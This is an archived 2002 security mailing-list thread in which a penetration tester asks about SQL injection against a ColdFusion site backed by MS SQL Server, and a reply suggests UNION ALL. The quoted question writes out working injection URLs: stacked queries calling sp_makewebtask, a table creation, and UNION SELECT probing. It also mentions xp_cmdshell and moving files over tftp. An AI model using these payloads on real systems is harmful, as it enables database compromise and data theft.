Hi. You must use UNION ALL to get all the rows. For new techniques take a look a this paper: Manipulating MS Sql Server using sql injection. http://www.appsecinc.com/news/briefing.html#inject Cesar. --- Mr Ro <vnmrroat_private> wrote: > hello pen-tester, > I am dealing with a pen-test agains a CFM server > with > MSSQL as backend. It is vulnerable with direct SQL > injection. > I figure out that I can create,drop...table, execute > xp_cmdshell, sp_makewebtask, so i submit: > submit: > http://mysite/file.cfm?id=4546;exec sp_makewebtask > "C:\winnt\temp\blah.htm","select * from > master..sysmessages"-- > it's okay, and I want to get > "C:\winnt\temp\blah.htm". > I submit: > http://mysite/file.cfm?id=4567;create table blah > (line > varchar(8000))-- > and then, I submit: > http://mysite/file.cfm?id=4567 UNION SELECT line > from > mrro-- > it returns an error complain that "All queries in an > SQL statement containing a UNION operator must have > an > equal number of expressions in their target lists." > so > I keep adding "line" in my request url > (http://mysite/file.cfm?id=4567 UNION SELECT > line,line,line from mrro--), finally it returns an > error message like this: > "[Microsoft][ODBC SQL Server Driver][SQL Server]The > text, ntext, or image data type cannot be selected > as > DISTINCT." > question here: who can explain me what happened ? > > I know there is another way to download or upload > files using "tftp", so is there any free "tftp" > server > for me to use instead of installing a new one ? > thank for reading. > best regards > mrro > > __________________________________________________ > Do you Yahoo!? > Yahoo! News - Today's headlines > http://news.yahoo.com > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus Security > Intelligence Alert (SIA) > Service. For more information on SecurityFocus' SIA > service which > automatically alerts you to the latest security > vulnerabilities please see: > https://alerts.securityfocus.com/ > __________________________________________________ Do you Yahoo!? Yahoo! News - Today's headlines http://news.yahoo.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Mon Sep 16 2002 - 21:46:55 PDT